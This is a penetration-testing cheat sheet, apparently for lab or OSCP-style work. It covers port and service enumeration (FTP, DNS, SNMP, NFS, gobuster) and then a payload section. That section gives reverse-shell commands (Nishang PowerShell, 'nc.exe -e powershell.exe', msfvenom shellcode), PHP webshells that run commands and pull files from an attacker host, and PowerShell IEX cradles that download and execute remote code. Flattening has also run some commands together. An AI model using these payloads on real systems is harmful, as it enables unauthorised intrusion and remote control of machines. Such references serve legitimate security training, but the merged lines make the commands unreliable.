Automated nmap scanning (my preference is nmapAutomator, never missed a port)
1 2 3 4
# It is recommended to scan ONE IP at a time # Do NOT overload the network # All scans, consecutively: Quick, Targeted, UDP, All ports, Vuln scan, CVE scan, Gobuster, Nikto nmapAutomator ip All
Banner Grabbing
1 2 3
telnet ip port nc -nv ip port curl -iv $ip
Port 21 - FTP
Nmap script scanning - will reveal anonymous access
1
nmap -Pn -n -vvv -p21 -sC -sV $ip
Checking anonymous access manually
1 2 3
ftp ip ftp> USER anonymous ftp> PASS anonymous
Easy view of FTP content - Browse to:
1
ftp://$ip
Uploading a binary or webshell
1 2
ftp> binary ftp> put file/name
Port 22 - SSH
Additional banner grabbing
1
ssh root@$ip
Port 53 - DNS
1 2 3 4 5 6 7 8
# Get nameservers and domain name of the IP address nslookup nslookup> server $target_ip nslookup> $target # o/p: ns1.example.com
# Get all sub-domains host -l -a example.com $target_ip# or ns1.example.com
Use Wappalyzer to identify technologies, web server, OS, database server deployed
View-Source of pages to find interesting comments, directories, technologies, web application being used, etc.
Finding hidden content Scanning each sub-domain and interesting directory is a good idea
1 2 3 4 5 6 7 8
# Use small common wordlist first # Use big wordlist next # Use CMS specific wordlist if one is found gobuster dir -u http://$ip -w /wordlist -o gobust.out # Find technology specific content gobuster dir -u http://$ip -w /wordlist -o gobust_php.out -x php # Find hidden notes, readme, changelog gobuster dir -u http://$ip -w /wordlist -o gobust_txt.out -x txt
Files to browse manually
1 2 3 4
/robots.txt /sitemap.xml # Make it throw an error /doesnotexist
List shares Note: smbmap will state access type available, smbclient will NOT. To check access type using smbclient, it’s best to access each share, read a file, and write a file.
# Brute force community strings # echo public > community # echo private >> community # echo manager >> community # for ip in $(seq 1 254);do echo 10.11.1.$ip;done > snmp-ips onesixtyone -c community -i snmp-ips
# Enumerate entire MIB tree snmpwalk -c public -v1 $ip # Enumerate specific MIB Value snmpwalk -c public -v1 $ip$MIB_Value
snmp-check $ip
Port 2049 - NFS
1 2 3 4 5 6 7 8 9 10 11
# NFS < v4 # Enumerating shares available, and mount points showmount -e $ip showmount -a $ip
# Mounting, x = NFS Version mount -t nfs -o vers=x $ip:<share> <local_dir>
# On target machine # Find mount points on the target where SUID programs and scripts can be run from mount | grep 'nosuid\|noexec'
Shells / Payloads
Universal Listeners
1 2 3 4 5 6 7
# Netcat [sudo] rlwrap nc -nvlp <port>
# msf multi/handler msf(exploit/multi/handler)> set payload path/to/payload msf(exploit/multi/handler)> set LHOST <ip> # or <interface> msf(exploit/multi/handler)> set LPORT <port>
PowerShell reverse shell available here PHP reverse shell available here Netcat for Windows available here
1 2 3 4 5 6 7 8 9
# PowerShell cp /opt/nishang/Shells/Invoke-PowerShellTcp.ps1 shell.ps1 vi shell.ps1 # go to end of file, paste the following Invoke-PowerShellTcp -Reverse -IPAddress [attacker_ip] -Port [attacker_port] # close, reverse shell ready to use
# Netcat - use x64 or x32 as per target. powershell.exe or cmd.exe nc.exe x.x.x.x <port> -e powershell.exe
PHP Webshells
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
# Basic. system() or shell_exec() or exec() <?php system($_GET['cmd']);?>
# More functional <?php $ip = 'http://10.10.14.4/'# [:port] . Change this # Upload if (isset($_GET['fupload'])) { file_put_contents($_GET['fupload'], file_get_contents($ip . $_GET['fupload'])); }; # Execute code # shell_exec() or system() or exec() if (isset($_GET['cmd'])) { echo"<pre>" . exec($_GET['cmd']) . "</pre>"; }; ?>
# WAR msfvenom -p java/jsp_shell_reverse_tcp LHOST=<ip> LPORT=<port> -f war -o shell.war
Shellcode
Select appropriate architecture
1 2 3 4 5 6 7 8 9
# Linux Staged - use python or c msfvenom -p linux/x86/shell/reverse_tcp LHOST=<ip> LPORT=<port> -f python # Linux Stageless - use python or c msfvenom -p linux/x86/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f python
# Windows Staged - use python or c msfvenom -p windows/x64/shell/reverse_tcp LHOST=<ip> LPORT=<port> -f python # Windows Stageless - use python or c msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f python
Upgrading your shell - Linux
Upon initial access, it is crucial to achieve the highest functional shell possible for privesc purposes!
1 2 3 4 5 6 7 8 9 10
# On victim machine which python[3] python[3] -c 'import pty;pty.spawn("/bin/bash")' # background the listener using ctrl+z stty -a # notice the number of rows and columns stty raw -echo # foreground the process: type fg, press enter stty rows xx stty columns xxx export TERM=xterm-256color
# Does not save file on the system powershell.exe -nop-ep bypass -c"IEX(New-Object Net.WebClient).DownloadString('http://<ip>/<file_name>')" # Saves file on the system powershell.exe -nop-ep bypass -c"iwr -uri http://<ip>/<file_name> -outfile path/to/save/file_name" powershell.exe -nop-ep bypass -c"IEX(New-Object Net.WebClient).DownloadFile('http://<ip>/<file_name>','path/to/save/file_name')"
echo$storageDir = $pwd >> wget.ps1 $webclient = New-Object System.Net.WebClient >> wget.ps1 # Download file from $url = "http://<ip>/file_name" >> wget.ps1 # Save file as $file = "file_name" echo$webclient.DownloadFile($url,$file) >>wget.ps1 # execute the script as follows powershell.exe -nop-ep bypass -nol-noni-f wget.ps1
TFTP (UDP)
1
tftp -i <ip> get file_name
SMB
1 2 3 4 5 6 7 8
# cmd.exe net use Z: \\<attacker_ip>\share_name # To access the drive Z: # PowerShell New-PSDrive-Name"notmalicious"-PSProvider"FileSystem"-Root"\\attacker_ip\share_name" # To access the drive notmalicious:
FTP
1 2 3 4 5 6 7 8 9 10 11 12 13
ftp <ip> ftp>binary ftp>get file_name
# One-liner downloader # in cmd.exe do not use quotes in an echo command echo open <ip> >> download.txt echo anonymous >> download.txt echo anon >> download.txt echo binary >> download.txt get file_name >> download.txt bye >> download.txt ftp -s:download.txt